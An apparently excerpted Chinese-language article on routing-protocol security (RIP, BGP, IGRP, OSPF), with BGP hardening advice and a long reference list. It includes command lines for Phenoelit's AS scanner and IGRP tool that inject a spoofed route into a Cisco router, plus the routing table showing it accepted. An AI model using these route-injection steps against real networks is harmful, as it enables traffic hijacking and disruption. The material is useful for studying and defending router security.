此文章讨论了有关对网络底层协议的攻击和防止攻击的方法,非凡是关于路由和路由 协议的漏洞,如Routing Information PRotocol (Rip,路由信息协议), Border Gateway Protocol (边缘网关协议), Open Shortest Path First (OSPF,开放最短路径优先协议)等。
test# ./ass -mA -i eth0 -D 192.168.1.10 -b15 -v (这里的-i是接口,-D是目的地址,-b15指的是自主系统0-15之间 ASS [Autonomous System Scanner] $Revision: 2.14 $ (c) 2k FX Phenoelit (http://www.phenoelit.de) No protocols selected; scanning all Running scan with: interface eth0 Autonomous systems 0 to 15 delay is 1 in ACTIVE mode
Building target list ... 192.168.1.10 is alive Scanning ... Scanning IGRP on 192.168.1.10 Scanning IRDP on 192.168.1.10 Scanning RIPv1 on 192.168.1.10 shutdown ...
test# ./igrp -i eth0 -f routes.txt -a 10 -S 192.168.1.254 -D 192.168.1.10 当然这里的routes.txt需要你自己指定: routes.txt: # format # destination:delay:bandwith:mtu:reliability:load:hopcount 222.222.222.0:500:1:1500:255:1:0
Cisco#sh ip route Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default U - per-user static route
Gateway of last resort is not set
10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks C 10.1.2.0/30 is directly connected, Tunnel0 S 10.0.0.0/8 is directly connected, Tunnel0 C 192.168.9.0/24 is directly connected, Ethernet0 C 192.168.1.0/24 is directly connected, Ethernet0 I 222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet0 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 看到没有,到达222.222.222.0/24经由192.168.1.254
要使BGP更安全,你最好对端口179采用访问列表控制,使用MD5认证,使用安全传输媒体进行 安全BGP通信和执行路由过滤(你可以查看下面的文档(see http://www.cisco.com/univercd/cc/ td/doc/prodUCt/software/ios120/12cgcr/np1_c/1cprt1/1cbgp.htm#40309)以及一些标准的路 由安全设置过滤配置。 Open Shortest Path First (OSPF,开放最短路径优先协议)
上面的一些信息你可以参考http://www.ietf.org/rfc/rfc2328.txt和JiNao对OSPF的漏洞 分析:On the Vulnerabilities and Protection of OSPF Routing Protocol (http://ww w.anr.mcnc.org/projects/JiNao/ic3n98.ps).
Cisco Systems. “Improving Security on Cisco Routers”. URL: http://www.cisco.com/warp/public/707/21.html
Convery, Sean (CCIE #4232) and Trudel, Bernie (CCIE #1884). “SAFE: A Security Blueprint for Enterprise Networks”. URL: http://www.cisco.com/warp/public/cc/so/cuso/epso/sqfr/safe_wp.htm
Frank Jou, Y. “Scalable Intrusion Detection for the Emerging Network Infrastru- cture”. URL: http://www.anr.mcnc.org/projects/JiNao/JiNao.html
Prue, Walt. “Re: Some abuse detection hacks”. NANOG list. (Mon, 9 Mar 1998) URL: http://www.cctec.com/maillists/nanog/historical/9803/msg00035.html
“Divert Sockets for Linux”. URL: http://www.anr.mcnc.org/~divert/
Obecian. “The nemesis packet injection tool-suite”. URL: http://www.packetninja.net/nemesis
Humble. “Spoofing RIP (Routing Information Protocol)”. URL: http://www.technotronic.com/horizon/ripar.txt
Cisco Press. “Routing Information Protocol”. (8 Dec 1999). URL: http://www.cisco.com/cpress/cc/td/cpress/fund/ith2nd/it2444.htm
Rekhter, Y. “A Border Gateway Protocol 4 (BGP-4)”. Request for Comments 1771. (Mar 1995). URL: http://www.isi.edu/in-notes/rcf1771.txt
Moy, J. “OSPF Version 2”. Request for Comments 1583. (March 1994). URL: http://www.isi.edu/in-notes/rfc1583.txt
Cisco Press. “Designing & Implementing an OSPF Network”. (2 Aug 2000). URL: http://www.cisco.com/cpress/cc/td/cpress/design/ospf/on0407.htm - xtocid1636554
Cisco Press. “RIP and OSPF redistribution”. (12 May 2000). URL: http://www.cisco.com/univercd/cc/td/doc/cisintwk/ics/cs001.htm
Grefer, Roland. Re: “Anyone know what IP protocol #54 is?”. SANS Institute Global Incident Analysis Center, Detects Analyzed 11/10/00. (10 Nov 2000). URL: http://www.sans.org/y2k/111000.htm
Ahmad, Dave & Rauch, Jeremey. “Routers, Switches & more: The glue that binds them all together” Black Hat Briefings 200, Las Vegas USA. (26 July 2000). URL: http://www.blackhat.com/html/bh-multi-media-archives.html
Batz. “Security Issues Affecting Internet Transit Points and Backbone Providers”. Black Hat Briefings 1999, Las Vegas. (7-8 July 1999). URL: http://www.blackhat.com/html/bh-multi-media-archives.html
Oquendo, J. “Theories in DoS”. URL: http://www.antioffline.com/TID/
Silicosis. “L0pht security advisory”. (11 August 1999). URL: http://www.l0pht.com/advisories/rdp.txt
OSPF Version 2 RFC http://www.ietf.org/rfc/rfc2328.txt